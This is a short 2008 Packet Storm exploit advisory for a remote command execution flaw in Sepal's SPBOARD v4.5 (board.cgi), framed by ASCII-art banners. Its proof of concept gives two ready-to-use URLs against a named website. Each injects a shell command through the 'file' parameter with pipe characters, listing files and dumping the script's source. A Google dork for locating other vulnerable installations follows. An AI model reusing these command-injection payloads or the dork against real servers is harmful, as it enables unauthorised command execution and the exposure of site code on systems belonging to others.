sepalspboard-exec.txt

2008-10-29T00:00:00
ID PACKETSTORM:71320
Type packetstorm
Reporter GolD_M
Modified 2008-10-29T00:00:00

Description

                                        
                                            ` _____ ____ __ __ _ ____ ____ ____   
|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___|  
| | | |_) | \ V / / _ \ | | _ | | | |   
| | | _ < | | / ___ \ | |_| | _ | |___ | |___   
|_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____|  
  
  
Sepal's SPBOARD v4.5 (board.cgi) Remote Command Execution Vulnerability  
Script : ):  
POC :   
|---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|ls -lia|&action=down_file  
|---> http://sansuyu.net/cgi-bin/spboard/board.cgi?id=ors1&number=908.cgi&file=|cat board.cgi|&action=down_file  
|---> Open By Mozilla Firefox   
Dork : http://www.google.com.ly/search?hl=ar&q=SPBOARD+v4.5  
  
____ _ _ __ __   
/ ___| ___ | | __| | | \/ |  
| | _ / _ \ | | / _` | | |\/| |  
| |_| | | (_) | | |___ | (_| | | | | |  
\____| \___/ |_____| \__,_| _____ |_| |_|  
|_____|   
  
  
`